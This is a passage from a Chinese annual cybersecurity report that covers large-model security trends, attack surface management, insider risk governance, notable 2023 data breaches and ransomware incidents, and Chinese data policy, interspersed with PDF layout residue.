LIME8、SHAP9),基于梯度的可解释方法(如显著图(Saliency Map)10、积分梯度法(Integrated Gradients)、注意力机制1Y.Bai,S.Kadavath,S.Kundu,A.Askell,J.Kernion,A.Jones,A.Chen,A.Goldie,A.Mirhoseini,C.McKinnon,Constitutional ai:Harmlessness from ai feedback,Publisher,City,2022.2Y.Liu,X.Liu,H.Chen,Y.Yu,Does Debiasing Inevitably Degrade the Model Performance,Publisher,City,20223Y.Guo,Y.Yang,A.Abbasi,Auto-debias:Debiasing masked language models with automated biased prompts,in:Proceedings of the 60th Annual Meeting of the Association for Computational Linguistics(Volume 1:Long Papers),2022,pp.1012-1023.4B.Thomee,D.A.Shamma,G.Friedland,B.Elizalde,K.Ni,D.Poland,D.Borth,L.-J.Li,YFCC100M:The new data in multimedia research,Publisher,City,20165C.Schuhmann,R.Beaumont,R.Vencu,C.Gordon,R.Wightman,M.Cherti,T.Coombes,A.Katta,C.Mullis,M.Wortsman,Laion-5b:An open large-scale dataset for training next generation image-text models,Publisher,City,2022.6L.Cai,Z.Zhang,Y.Zhu,L.Zhang,M.Li,X.Xue,Bigdetection:A large-scale benchmark for improved object detector pre-training,in:Proceedings of the IEEE/CVF Conference on Computer Vision and Pattern Recognition,2022,pp.4777-47877S.Wang,Y.Xu,Y.Fang,Y.Liu,S.Sun,R.Xu,C.Zhu,M.Zeng,Training data is more valuable than you think:A simple and effective method by retrieving from training data,Publisher,City,20228M.T.Ribeiro,S.Singh,C.Guestrin,Why should i trust you?Explaining the predictions of any classifier,in:Proceedings of the 22nd ACM SIGKDD international conference on knowledge discovery and data mining,2016,pp.1135-11449S.M.Lundberg,S.-I.Lee,A unified approach to interpreting model predictions,Publisher,City,201710K.Simonyan,A.Vedaldi,A.Zisserman,Deep inside convolutional networks:Visualising image classification models and saliency maps,Publisher,City,2013网络安全2024-守初心 创新质绿盟版3-13排版.indd 62网络安全2024-守初心 创新质绿盟版3-13排版.indd 622024/5/8 17:43:052024/5/8 17:43:05063新技术发展篇可解释方法(例如 Perturbed Masking1、ATTATTR2)。3.1.4 发展趋势当前的 AI 大模型发展得尚不成熟,面临着诸多隐患与风险。可以预见,随着深度学习技术的发展和研究的深入,以大模型为目标模型的攻击会朝着更为高效、轻量级的方向发展,对实际部署和应用中的大模型造成更大的威胁,同时随着大模型能力的提升和应用范围的扩展,潜在的安全漏洞和隐患会引发更大范围和更为严重的后果。因此,提供商可以通过提高相关专有信息的安全性来推广自己,例如推出新的服务或安全产品以满足出现的人工智能安全需求。当前存在着攻防研究进度不匹配、防御方案落后于攻击技术的现象。大模型安全领域的发展趋势和方向有:可解释性方法研究将不断深入。现有可解释性方法多为启发式、经验性归因算法,依然存在局限性。可解释性研究的发展不仅有助于大模型的可控生成,大模型攻防技术也都将随着可解释研究的深入而具备更强的针对性和效果。可解释性技术为攻击者提供更详细的模型信息,更准确地定位模型脆弱点或数据关键区域,有效提高攻击效率和攻击成功率。同样地,基于可解释方法,防御者得以更了解模型的决策依据、安全漏洞以及决策弱点,从而更好地针对模型漏洞设计点对点防御策略。另外,一些可解释技术在解释结果与模型真实情况之间存在差异,不仅造成解释结果在准确性上的不足,也给针对可解释技术自身的攻击提供了实施空间,可解释技术的一致性、脆弱性和准确率尚缺乏合理的量化评估标准,研究一套更为综合的、多层次的、可靠的解释方法评估体系也是未来的方向之一。多模态内容中的安全问题将得到更多重视。多模态预训练模型展现出了强大的特征提取能力,然而作为训练数据的图像、文本、音频等多模态内容面临着多类攻击算法的威胁和模态对齐风险。比起在单一模态数据上训练的模型,多模态模型的安全性更为复杂,多模态内容安全也是相当有价值的研究方向。缓解基础模型安全缺陷的继承现象。基础模型中存在的安全缺陷会被下游模型所继承,一方面涌现特质为基础模型需要面临的潜在安全威胁和漏洞带来不确定性,另一1Z.Wu,Y.Chen,B.Kao,Q.Liu,Perturbed masking:Parameter-free probing for analyzing and interpreting BERT,Publisher,City,20202Y.Hao,L.Dong,F.Wei,K.Xu,Self-attention attribution:Interpreting information interactions inside transformer,in:Proceedings of the AAAI Conference on Artificial Intelligence,2021,pp.12963-12971网络安全2024-守初心 创新质绿盟版3-13排版.indd 63网络安全2024-守初心 创新质绿盟版3-13排版.indd 632024/5/8 17:43:052024/5/8 17:43:05064网络安全 2024:守初心 创新质方面同质化特质则会扩散基础模型安全缺陷的影响。在微调阶段如何减少这种继承效应的影响,将成为确保大模型在开发和部署中的安全性所难以回避的挑战。未来大模型的攻防将在动态抗衡中不断升级,大模型需要应对的新型安全威胁将不断涌现和升级,因此,需要建立完善统一的大模型安全评估框架、探索有效的防御机制、实现 AI大模型安全监管和可控生成,促进大模型安全生态的建设。3.2 攻击面管理3.2.1 攻击面管理的背景随着企业网络环境的复杂化和数字化转型的推进,网络攻击面不断扩大。不仅涉及内部网络,还包括云服务、移动设备、第三方合作伙伴等多个外部网络,使得企业面临的网络威胁更加多样化和复杂化。网络攻击技术不断演进,新型的威胁如 APT(高级持续性威胁)、勒索软件、供应链攻击等层出不穷。因此,结合国内外安全现状,防守方需要采用新的方法来可视化和评估组织的攻击面。3.2.2 攻击面管理必要性为了更好的应对上述多重安全挑战,企业需用新的安全理念来指导规划、建设、运营安全工作。如果仍以防守方被动的风险管理的视角来解决资产、漏洞等问题,那么由于业务数字化网络安全2024-守初心 创新质绿盟版3-13排版.indd 64网络安全2024-守初心 创新质绿盟版3-13排版.indd 642024/5/8 17:43:052024/5/8 17:43:05065新技术发展篇转型、上云等带来的攻击面扩大,包括影子资产、供应链攻击、数据暗网泄露、代码托管平台泄露、社工库攻击等风险将变得不可预测,而且攻击面会不断动态扩展,风险将不受控制。因此,Gartner 等咨询机构指出,可通过引入“攻击面管理”以“攻击者视角”来检查审视单位网络资产可能存在的攻击面及脆弱性,包括了一切可能被潜在攻击者利用的设备、信息、应用等数字资产,具体包括但不限于硬件设备、云主机、操作系统、IP 地址、端口、证书、域名、Web 应用、业务应用、中间件、框架、公众号、小程序、App、源代码等。从而实现安全团队对暴露资产以及攻击面进行科学高效的管理。3.2.3 攻击面管理框架攻击面管理既要考虑对外部攻击面、内部攻击面的核查,更确保实现与既往漏洞扫描、风险管理、态势感知平台的兼容和整合,保证关联系统的一体化联动,实现综合攻击面管理,也防止企业组织重复建设。Gartner 发布的2021 安全运营技术成熟度曲线中明确提到了攻击面的两个新兴技术:网络资产攻击面管理(Cyber asset attack surface management,CAASM)和外部攻击面管理(External Attack Surface Management,EASM),其中,EASM 强调外部攻击者视角,针对暴露在公网的资产(包括互联网、云、物联网、智慧城市等环境下的资产与风险),主要通过黑客探测的手法与情报来进行分析。CAASM 则强调内外部全局视角,通过 API 与其他系统集成的方式来解决持续的资产可见性和漏洞风险。网络安全2024-守初心 创新质绿盟版3-13排版.indd 65网络安全2024-守初心 创新质绿盟版3-13排版.indd 652024/5/8 17:43:062024/5/8 17:43:06066网络安全 2024:守初心 创新质3.2.4 攻击面管理核心能力1.分支机构资产综合纳管行业监管机构、组织机构总部明确要求分支机构上报关键信息基础设施资产,然而分支机构上报的资产信息普遍存在漏报、错报或信息滞后的情况,因此监管机构、企业组织集团总部可以通过攻击面管理解决方案将分支机构的潜在攻击暴露面资产纳入管辖范围。具体到不同的使用主体:监管机构对下辖被监管各单位上报的资产进行核查、补充,以满足后续的合规评级、安全通报、应急响应等需求;集团总部对各地分子公司、营业网点等分支机构的资产进行全面排查,掌握集团整体攻击暴露面情况;当然,分支机构也可以自行采购或建设攻击面管理解决方案进行自查,然后将收敛后的资产信息上报给监管或集团总部,从而掌握主动权。2.实战攻防演练攻击面管控近年来,随着国家级、地市级、行业级实网攻防演练活动逐步趋于常态化,作为重点关键基础设施行业之一的金融行业,需要在各级攻防演练活动开始前对自身潜在的攻击暴露面进行提前发现和收敛。常见的可能被攻击者利用的暴露中在互联网上的新型数字资产有 GitHub、网盘文库、公众号小程序等;此外可以帮助防守方发现软件供应链、合作伙伴等更深层次的攻击暴露面,例如开源组件、合作商 API 接口等。演练开始后,高危漏洞事件集中式爆发,攻击面管理可在情报披露时对业务影响范围和暴露面进行预判,提前做好防护加固措施;当利用细节公开时,对攻击面进行全面摸排,协助防守方第一时间做出收敛响应,及快速定位、处置失陷资产。3.风险闭环与溯源取证行业业务、用户数据等资产价值攀升,也是网络犯罪者关注的攻击对象。在日常安全运营中,若不幸发生了数据泄露,组织机构可以通过攻击面管理解决方案从泄露数据(例如暗网、黑市中的样本数据)向上溯源,还原攻击链,进而找到最早的攻击入口。一方面将相关设备、资产乃至人员信息作为举证材料纳入证据链,为下一步诉诸法律提供依据;另一方面,对其他同类资产进行横向排查,避免遗漏尚未检出的同类攻击行为,确保泄露途径已排查完整。最后,将所有符合此类攻击链特征的攻击暴露面统一进行收敛,避免再发生同类数据泄露事件。网络安全2024-守初心 创新质绿盟版3-13排版.indd 66网络安全2024-守初心 创新质绿盟版3-13排版.indd 662024/5/8 17:43:062024/5/8 17:43:06067新技术发展篇4.后疫情时代远程攻击面管理新冠疫情给全球经济和金融行业带来的影响是显著的,伴随远程办公的工具和场景变多,互联网攻击面不断扩大,越来越多的业务系统需要对互联网开放,无论是通过端口映射将业务系统直接开放公网访问,还是使用 VPN 打通远程网络通道,都是在原本脆弱的网络防护边界增加更多暴露面。接入网络的人员、设备、系统、应用的多样性呈指数型增加,企业的业务数据在复杂的人员、设备、系统、应用间频繁流动,数据流动的复杂性、数据泄露和滥用的风险均大幅增加。因此,后疫情时代的攻击面管理及收敛能力的关注重点就不再仅限于传统中心化的 IT 资产,而是扩大到更大范围和更多维度的数字资产。这满足了数字资产无处不在、攻击暴露面无处不在的安全需求。3.3 内幕风险管理1 3.3.1 内幕风险的定义内幕风险,是指来自组织关联人员恶意的、粗心的或疏忽的威胁,包含员工、前员工、承包商或商业伙伴等,由于这些人群掌握有关组织安全实践、数据和计算机系统的内部信息,因此他们可能构成欺诈、窃取机密或有商业价值的信息、破坏计算机系统等方面的威胁。Gartner 从 2020 年开始发布内幕风险方案市场指导报告,其主要受到 2019 新冠导致全球各国大范围采用远程办公的趋势影响,越来越多的安全管理团队关注员工监控,以确保符合组织的风险承受能力。尽管到了 2024 年,新冠病毒已经成为过去时,但组织机构对员工及具备内幕信息优势的关联群体的行为监控仍然持续热议,并且已成为融合员工绩效管理、企业合规管理、离任审计等各类场景的关键内容。安全领域的内幕风险不同于内部威胁,因为传统的内部威胁监控的思维是以资产为中心,通过叠加安全技术,不断搜集数据,进而分析安全问题。其客体上关注软、硬件以及应用等资产的脆弱性和异常参数,主体上聚焦发现特定的恶意人员及其恶意行为。在内部威胁方面,其关键功能在于发现我们经常提到的“内鬼”,即具有内部权限和优势信息,但尝试非法利用的合法员工。11 Paul Furtado,A New Look at Insider Risk,Gartner,2022.2 Paul Furtado,Protection From the Risk WithinManaging Insider Risk,Gartner,2022.3 Randy Trzeciak Stop Chasing Insider Threats Start Managing Insider Risk,RSA Conference,2022.4 Jonathan Care,Brent Predovich,Paul Furtado,Market Guide for Insider Risk Management Solutions,Gartner,2020.5 Brent Predovich,Market Guide for Insider Risk Management Solutions,Gartner,2023.6 Jonathan Care,Paul Furtado,The Rule of 3 for Proactive Insider Risk Management,Gartner,2021.网络安全2024-守初心 创新质绿盟版3-13排版.indd 67网络安全2024-守初心 创新质绿盟版3-13排版.indd 672024/5/8 17:43:062024/5/8 17:43:06068网络安全 2024:守初心 创新质而内幕风险管理的思维是以人为中心,在传统威胁监控的基础上,纳入监察的能力,通过融合安全技术与人员行为,关联人的背后动机,进而进行全体员工的行为分析和风险发现。所以其不但分析发现主观恶意的人员,还会分析主观无恶意但是客观已攻陷、以及主观缺乏安全意识但客观误操作诱发风险的人员。从员工主体上,内幕风险拓展了对员工主观意识的分析和管理范围,合理的综合考虑了最广泛的合法员工的不安全、违规行为。而从逻辑上,正如 Gartner 和 Forrester 对内幕风险与内部威胁的定义一样,并非所有的内幕风险最终演变成内部威胁,但是所有的内部威胁绝对源于内幕风险,两者的对比如图所示。值得注意的是,“Insider”一词于两类场景下,绿盟科技采用了不同的翻译,既考虑了其本身“内线、内鬼”的含义,也考虑了需要同国内既往翻译习惯加以区分,即安全领域一直将“内鬼”归为内部威胁,Insider Risk 不能等同于 Internal Risk。图 3.6 内幕风险与内部威胁对比3.3.2 内幕风险管理必要性根据 Forrester 于 2021 年 12 月发布的内幕风险报告以及 2022 年 RSA 大会公布的相关数据,59%的组织关注外部威胁大于内部威胁,58%的组织没有专门针对内部风险管理的团队,39%的组织相关预算匮乏且 38%的组织缺乏相关内部威胁管理的技术能力。于此同时,70%的企业组织完全没有应对内幕风险的管理策略,而且 29%的组织根本不认为内部人员威胁更大,可是现实是过去 12 个月内 59%的安全事件均由企业内部人员引发。以资产为核心的威胁发现在数据泄露事件不断、员工泄愤报复频发的背景下变得捉襟见肘,而对于只关注恶意员工与恶意行为的传统内部威胁管理模式,也无法应对当前诸如非恶网络安全2024-守初心 创新质绿盟版3-13排版.indd 68网络安全2024-守初心 创新质绿盟版3-13排版.indd 682024/5/8 17:43:062024/5/8 17:43:06069新技术发展篇意误操作高发、离职员工转移数据的新型风险场景。安全已经不再像早年的网络安全充满了激烈的形式化攻击对抗,当前企业组织网络与数据安全防护的态势趋于静默环境下的资源和信息争夺的实质性对抗,其核心在于既定安全预算下如何保持合理的风险敞口以获得管理效率,既不能置安全于不顾,但又不能过度防护。当前很多企业的安全团队对组织的综合风险,尤其是全体内部员工的风险依然缺乏准确的把握,甚至很低的认知。组织内人力资源、法务、公共关系团队也往往无法从总体安全的角度把握员工在职期间、离职后的连续合规性,所以传统依赖围绕信息资产防护的思路,俨然难以应对围绕员工行为的各类风险。所以内幕风险管理的必要性,体现在两个方面,首先其包容评价了不同主观意识状态下员工的行为风险,整合了管理流程,并通过持续安全意识教育保证闭环,引导并修正人员的行为。其次,内幕风险管理是在总体风险管理框架下,一项以“人因”为要素的关键安全管理活动,持续性监控、分析、处置相关风险,其综合了资产与安全,以保护相关业务与资产的价值处于受控状态。内幕风险管理正是在风险管理框架内,纳入安全领域涉及的威胁监测、漏洞发现、基线维护、应急响应,从内部人员这一关键角色出发,在包容传统资产威胁管理的基础上,将技术和管理于内幕风险的场景下进行了深度融合,其进一步整合人力资源管理、关公关系管理、安全意识培训等要素,闭合风险管理流程,解决资源与风险错配的问题,以提升安全管理效率。3.3.3 内幕风险动机与威胁分类针对内幕风险的威胁源,以用户为基准参数,整体划分成粗心用户、恶意用户以及失陷用户三类。相关用户类型以及用户动机如图所示。其中失陷用户是指在其主观未知的情况下,账户被窃权、控制,从而被攻击者利用,其定义与拒绝服务攻击(DOS 攻击)中的 Bot 即“肉鸡”较为类似,但不同之处是纳入了用户作为“自然人”的主观因素,而超越 Bot 一般只针对受控终端的客观“物”的范围。值得注意的是,根据 Gartner 的数据,粗心用户因为缺乏安全意识以及偶然的误操作带来的安全事件概率高达 63%,远高于我们一般关注的外部攻击的失陷用户风险发生概率 14%,这也成为内幕风险管理必要性的关键,也是区分内幕风险与内部威胁的基础。网络安全2024-守初心 创新质绿盟版3-13排版.indd 69网络安全2024-守初心 创新质绿盟版3-13排版.indd 692024/5/8 17:43:062024/5/8 17:43:06070网络安全 2024:守初心 创新质图 3.7 内幕风险用户动机与威胁分类我们若单独以离职员工为例,其离职前可能带来的威胁包括数据破坏、泄露、越权复制和使用,甚至于系统植入逻辑炸弹,在离职后于条件满足时触发,其主观既可以基于恶意,也可能源于公司缺乏明确管理制度下的思维惯性。传统的内部威胁管理并不关注后者,尤其是针对数据复制的场景,很多员工主观虽然无恶意,但习惯性离职前拷贝既有数据,用以支持自己到新公司履职后工作开展。匹配至员工角色,销售人员可能带走详细的公司客户名单以及合同,而软件开发人员会大批量复制代码和产品信息。所以公司应当明确管理规定,而且需要以可以明确获知、理解的方式事先约定相关行为的授权范围、合规性等问题。此外,传统的内部威胁管理更不跟踪员工离职后的行为,但是公司于此处存在两类非常高发的风险,一类为离职员工权限未及时全面解除,该离职员工还可以访问部分系统、数据,进行违规操作;另一类为员工故意规避保密、竞业履约责任,引发公司商业秘密泄露或技术竞争力与先进性,从而造成损失。后一类风险往往依赖公司人力资源管理和法务团队,但很多公司组织对于离职员工的履约行为跟踪能力和资源配备有限,更缺乏与安全部门技术团队的密切合作,成为内幕风险爆发的高危节点。3.3.4 内幕风险治理框架在定义内幕风险的基础上,Gartner 于内幕风险管理方面提出了 C.A.R.E 模型,即Contain(遏制)、Access(评估)、Resolve(处置)、Educate(教育)四步。其中于遏制阶段,需要实现用户、设备、网络实体高危行为的监测,并于相关行为出现时,触发安全策略,可以通过限制准入、限制网络、禁用 USB 接口、锁定设备、停止应用与数据同步的方式防止过度风险暴露;于评估阶段,持续监测评估,关注数据泄露事件的指征,于此环节完成行为分析、风险评估、既往分析、基线建立;于处置阶段,启动数据泄露事件进网络安全2024-守初心 创新质绿盟版3-13排版.indd 70网络安全2024-守初心 创新质绿盟版3-13排版.indd 702024/5/8 17:43:062024/5/8 17:43:06071新技术发展篇行响应,并解决问题,实际涉及违规用户的关键必要操作,管理层和人类资源管理部门、法务部门的事件升级流程;而于教育环节,主要落实并培养员工安全意识,降低未来的暴露风险,所以实际工作包括指定用户定制化培训、政策与协议下发确认流程。内幕风险管理框架下的安全意识培训具有及时性和针对性,异于传统的安全意识培训,因为内幕风险管理基于人的行为,也目的在于修正人的行为。绿盟科技在 C.A.R.E 的基础上,纳入了 ISO 31000 风险管理框架,融合了风险监测于评审、风险沟通与协商的流程,保证风险管理流程的闭环,更适宜从总体治理架构导入组织机构。而鉴于内幕风险管理关注组织核心价值,既囊库了传统资产为核心的理念,也纳入了“人”的新的要素,所以在风险管理的基础上,我们进一步融合 GRC 框架,联合了治理、合规要素,在考虑企业组织风险顶层战略要求下,关联组织愿景、文化、影响的要素,形成内幕风险治理框架,如图所示。图 3.8 内幕风险治理框架此外,企业组织于内幕风险管理落地的过程中,鉴于员工主观的恶意与否,既会于技术层面影响实际用户画像的逻辑和效果呈现,又会于后续风险处置层面影响责任划分,所以为了保持公司组织对外举证司法流程衔接的效率,我们进一步将 3.3.3 节中涉及的粗心用户、恶意用户、失陷用户进行了主观罪过和关联责任的映射,以弥补Gartner于此方面的分析不足,如图 4 所示。其中直接故意的主观罪过程度最高,而意外事件往往不涉及主观恶意。对应在网络安全2024-守初心 创新质绿盟版3-13排版.indd 71网络安全2024-守初心 创新质绿盟版3-13排版.indd 712024/5/8 17:43:072024/5/8 17:43:07072网络安全 2024:守初心 创新质经过客观方面评价后,确定承担责任或是满足客观有罪要件的情况下,在主观罪过的评价过程中,主观罪过越高对应的责任承担也会越高,而其往往企业组织要求证明相关员工的责任也会越重。图 3.9 中,直接故意是指明知自己的行为会造成危害结果,积极采取行动,希望和追求该危害结果的发生的心理状态,如直接攻击、植入逻辑炸弹;间接故意是指明知自己的行为可能会造成危害结果,但放任结果的发生,有可能涉及不作为的状态,如明知自己的账户口令被盗用,但离职不报任由情况恶化。粗心用户的责任介于中间,主要源于其职责潜在包含了保护、通报等义务,虽然其外在形式上往往较恶意用户的行为更不具有攻击特性,但并不意味着行为结果影响小,而且往往会被惩罚。此外,从责任层面,需要注意失陷用户有转化为粗心用户的通路,其主要源于该用户的工作职责涉及对应资产、数据的保护义务,虽然其在未知情况下被利用或被攻击,并不必然免责。图 3.9 主观罪过与用户分类映射3.3.5 内幕风险检测处置与跨组织联动根据内幕风险监测主体的特性,技术方面于基础需要建立对于员工行为的数据搜集和分析能力,完成风险分析并关联后续联动处置,相关内容如图所示。依据数据流转结构,在靠近用户侧能够收集用户数据、建立行为基线,并不断训练形成行为风险模型。在此基础上,于中间层关联用户的行为,实现各类风险、威胁的元数据库匹配,全面分析本地、云端各类资产与此员工行为的风险关系。在风险管理的框架下,对于超越安全基线和阈值的行为进行告警,联动 SOAR(安全编排自动化响应)进行阻断,防止风险蔓延的事件影响扩大。网络安全2024-守初心 创新质绿盟版3-13排版.indd 72网络安全2024-守初心 创新质绿盟版3-13排版.indd 722024/5/8 17:43:072024/5/8 17:43:07073新技术发展篇图 3.10 内幕风险检测处置流程同样以离职员工为例,为保持内幕风险管理的有效性,除常规解除各类权限操作,员工离职流程发起后,组织需要启动回溯离职前一段时间(数周或数月)内指定员工行为的审计流程,通过 UEBA(用户和实体行为分析)关联身份、权限、操作,发现越权操作、数据外发、非公司业务必要的大规模拷贝、“蚂蚁搬家”式分批次全库复制等违规和异常行为。组织同时应该在员工离职后至少几周内继续监控其活动,在不侵犯离职员工隐私的情况下维持有效的风险管理,建立取证审计追踪的管理流程,并在合适的情况下,引入专业外部第三方资源,落实回溯审计的职能。图 3.11 内幕风险管理联动内幕风险管理除了在技术层面建立完善的闭环检测响应系统,管理层面需要设立职责分离、最小权限等流程,并在技术与管理的结合的基础上,进一步纳入电子取证、证据链保全、法务支持等相关职能,确保有效的联动处置因内幕风险引发的安全事件,如上图所示。依然以离职员工为例,在离职过程中,人力资源管理部门应尽力倡导维持透明、互信的沟通,通过离职面谈以确保清晰沟通的同时评估员工的态度,降低因为分歧引发的不满甚至报复的概率。于此同时,员工离职后,需要持续针对员工履约行为进行监控,一般包括保密网络安全2024-守初心 创新质绿盟版3-13排版.indd 73网络安全2024-守初心 创新质绿盟版3-13排版.indd 732024/5/8 17:43:072024/5/8 17:43:07074网络安全 2024:守初心 创新质与竞业协议履约行为的跟踪,在合法取证的基础上,维护相关证据的完整性。所以一般会依赖法务团队,或是选择专业外包团队,对于离职员工违约行为采取及时的沟通、警告,甚至启动司法救济流程,以维护企业自身合法权益。而针对可能引发仲裁、诉讼的员工,维持有效的公共关系和监管机构信息交换和互通,防止因为诸如“员工爆料”、“实名举报”类似的负面事件或是不实信息等影响公司对外形象,造成股价、商誉的贬损。3.4 数据安全3.4.1 国内外数据安全事件2023 年,全球数据安全事件呈现频发态势,许多知名品牌企业与政府组织遭受数据泄露和网络攻击,造成巨大且不可挽回的损失。据 IBM Security 在数据泄露成本报告中的分析结果,2023 年全球数据泄露事件造成的损失平均每次达 445 万美元,三年间增长了15%。业务云化、数据上云,云原生浪潮在 2023 年继续向前,随之而来的是云环境下数据安全风险大幅增长。构建云的基础设施,如虚拟化平台、代码仓库,成为攻击者突破安全防护的焦点。云上风险带来的数据安全典型事件如下:2 月,欧洲多个安全机构发布了 ESXiArgs 勒索病毒的攻击预警,该病毒利用 2021 年披露的 ESXi 远程溢出漏洞(CVE-2021-21974)进行传播,主要影响旧版本 VMware ESXi 中的 OpenSLP 服务,可以被用来远程执行代码。11 月,通过公开 GitHub 仓库中泄露的 Kubernetes 敏感信息,研究人员获取了近 1亿条属于著名 ERP 软件厂商 SAP 的文件信息和下载权限。在 2023 年,数据加密勒索攻击依旧十分猖獗。臭名昭著的勒索组织 LockBits 在 2022 年经过组织内部快速迭代,跃居勒索行业第一,在勒索攻击事件整体减少、赎金总量和平均金额大幅下降的趋势中逆势狂飙。LockBits 倡导勒索软件及服务(RaaS)的攻击方式,其构建的勒索产业链各个关键已经趋于成熟,这也使得 2023 年 LockBits 四处出击,拿下诸多目标。1 月,英国皇家邮政遭 LockBits 攻击,被索要高达 8000 万美元赎金。勒索软件加密了用于国际运输的设备,并在用于海关备案的打印机上打印勒索赎金票据,致使包裹和信件的国际运输陷入停顿。6 月,台积电被 Lockbits 勒索 7000 万美元,后者威胁称,如果不交付勒索款项,将公开台积电的网络入口点、密码和其他机密信息。这将对台积电本身以及其重要客户网络安全2024-守初心 创新质绿盟版3-13排版.indd 74网络安全2024-守初心 创新质绿盟版3-13排版.indd 742024/5/8 17:43:072024/5/8 17:43:07075新技术发展篇如苹果、高通和英伟达造成严重威胁。10 月,Lockbits 对波音公司发起攻击,并要求公司在 11 月 2 日之前与他们联系以展开谈判。黑客声称已经窃取了大量敏感数据并准备进行发布,攻击事件对公司零部件和分销业务造成了一些影响,在波音拒绝支付赎金后,LockBits 泄露了 21.6GB 大小的波音文件。11 月,中国工商银行在美全资子公司工银金融服务有限责任公司(ICBCFS)遭勒索软件攻击,导致部分系统中断。随后,LockBit 组织代表公开确认对攻击负责。这次已经扰乱了美国国债市场,证券行业和金融市场协会一份声明显示,由于工商银行被攻击而无法结算国债交易,可能对美国国债的流动性产生巨大影响,并可能引发监管审查。另一方面,网络安全相关企业及其提供的安全产品与服务遭受攻击的事件异军突起,引发关注。作为软件供应链的一环,客户因使用存在数据安全风险的安全产品而被攻击的风险,成为了供应链攻击场景中的灰犀牛。盲目相信三方提供的安全产品与服务可能导致严重的后果。以下是发生在 2023 年的类似事件:3 月,瑞士安全厂商 Acronis 有 12GB 数据被公布在黑客论坛上,公布者声称这么做的原因是无聊和希望羞辱 Acronis。这家企业的首席信息安全官声称泄露的源头是他们一位客户用于向Acronis技术支持上传诊断数据的凭证,其他用户的数据仍然安全。5 月,勒索软件 Clop 组织利用了 Progress 软件公司的 MOVEit Transfer 文件传输工具中的一个严重漏洞,开始了大规模的勒索软件攻击活动。与传统的勒索软件攻击不同,本次的攻击行动并没有采用任何加密机制,而是以非法泄露数据作为勒索条件。根据新西兰网络安全公司 Emsisoft 的报告,针对 MOVEit 攻击波及了约 2620 家企业用户和 7720 万人。受害者包括 IBM,美国能源部,壳牌石油,BBC,英国航空,安永,以及杀毒软件巨头、诺顿和 Avast 的母公司 Gen Digital。网络安全2024-守初心 创新质绿盟版3-13排版.indd 75网络安全2024-守初心 创新质绿盟版3-13排版.indd 752024/5/8 17:43:072024/5/8 17:43:07076网络安全 2024:守初心 创新质图 3.12 MOVEit 网络攻击受影响的组织 7 月,Google 旗下的在线安全服务提供商 VirusTotal 承认,有 5600 名使用其威胁分析服务的客户信息被泄露,美国 FBI、NSA、司法部、网络司令部等情报机构雇员亦在其列。VirusTotal 澄清数据泄露是一名员工误操作导致的,而非网络攻击或漏洞缺陷导致的,且这些数据仅能被 VirusTotal 的合作伙伴与企业客户访问。9 月,英国供应链安全厂商 DarkBeam 被发现有超过 38 亿条数据泄露,这些数据是DarkBeam 从客户侧收集的已发生泄露的数据,用于在泄露事件发生时向用户告警。造成泄露的原因是一个未受保护的 elastic kibana 数据可视化分析服务,黑客通过它获取了其中存放的秘密信息。11 月,身份安全厂商 okta 报告他们的客服系统在 9 月底遭受的攻击远比之前预计的更糟糕。攻击者生成并下载了一份报告,包含 okta 所有客户的姓名、邮箱地址以及部分员工的信息,而此前 10 月份时 okta 的初步评估认为只有不到 1%的客户信息可能遭到泄露。3.4.2 政策和市场 国内政策网络安全2024-守初心 创新质绿盟版3-13排版.indd 76网络安全2024-守初心 创新质绿盟版3-13排版.indd 762024/5/8 17:43:072024/5/8 17:43:07077新技术发展篇2023 年数据安全领域政策密集推出,重点关注以下两个方面:a)跨境数据传输自 2021 年个人信息保护法生效以来,网信办于 2022 年先后公布了数据出境安全评估办法以及个人信息出境标准合同办法,至 2023 年 3 月 1 日评估办法规定的整改期届满。据公开资料的不完全统计,截止 2023 年底已公布通过评估的企业有 29 家,与国家网信办和各地省级网信办已受理的千余件申报相比,数据出境申报通过率或仅为百分之一。多数已存在数据出境业务、按规定需进行评估的企业仍然在评估流程中,而评估办法规定评估结果有效期仅为两年,企业面临反复而冗长的评估,可能对跨境业务造成不利影响。而 2023 年 9 月 28 号网信办公布的规范和促进数据跨境流动的规定(征求意见稿),在上述规定的基础上进一步细化规范,适当优化了审批程序和适用范围,一定程度地明确和放松了监管要求。此外,在 2023 年下半年,粤港澳大湾区范围内出台了一系列数据跨境相关的地方法规和标准指南,提供了规范数据跨境活动的多种机制,走在了数据跨境规范管理落地实践的前列。b)数据互联互通与数据交易继中共中央国务院于 2022 年年底发布关于构建数据基础制度更好发挥数据要素作用的意见、2023 年 2 月发布数字中国建设整体布局规划之后,国家数据局于 2023 年 10月 25 日的正式成立,标志着国家数字化发展迈出关键一步。该机构的宗旨是整合数据要素资源,推动数字创新引领的技术进步和市场发展。而在 2023 年的最后一天,国家数据局与网信办、工信部、科技部等部门联合印发“数据要素”三年行动计划(20242026 年),这是该机构自成立以来的首次重磅发声。可以看到,2023 年数据互联互通与数据交易领域的政策密集推出,其中包括:财政部公布对企业会计处理规定的修改,旨在将数据资源识别为无形资产,并按照相关准则处理;地方相关部门推动了数据互联互通与数据交易的新范式,旨在以更为动态的模式架构提升效率和合规性;地方监管部门在数据领域的立法和执法方面取得了新进展,正在推动以数据“三法”为指导的数据交易司法实践的落地。国内监管网络安全2024-守初心 创新质绿盟版3-13排版.indd 77网络安全2024-守初心 创新质绿盟版3-13排版.indd 772024/5/8 17:43:082024/5/8 17:43:08078网络安全 2024:守初心 创新质2023 年,数据安全领域国内最为重大的监管事件,当属中央网信办查处知网。2023 年 9 月 1 日网信办公布,根据调查,知网(CNKI)运营的 14 款 App 存在违反必要原则收集个人信息、未经同意收集个人信息、未公开或未明示收集使用规则、未提供账号注销功能、在用户注销账号后未及时删除用户个人信息等违法行为。依据网络安全法个人信息保护法行政处罚法等法律法规,综合考虑知网(CNKI)违法处理个人信息行为的性质、后果、持续时间,特别是网络安全审查情况等因素,对知网(CNKI)依法作出网络安全审查相关行政处罚的决定,责令停止违法处理个人信息行为,并处人民币5000万元罚款。根据个人信息保护法第六十六条:“有前款规定的违法行为,情节严重的,由省级以上履行个人信息保护职责的部门责令改正,没收违法所得,并处五千万元以下或者上一年度营业额百分之五以下罚款,并可以责令暂停相关业务或者停业整顿”,可以看到从罚款金额来说,网信办对知网作出的是“顶格处罚”,是自 2021 年个人信息保护法生效以来最高的。这强有力的反映了国家对于个人信息的保护力度,与整治破坏个人隐私保护不法行为的决心。国内市场a)数据要素市场随着数字技术和数字经济的迅猛发展,数据总量不断增长、数据要素交易市场化建设不断完善,推动数据要素价值和乘数效应不断放大。据工信数通统计分析:市场规模:2022 年,中国要素市场规模超 1000 亿元、同比增速 27%,2017-2022年年均复合增长率超 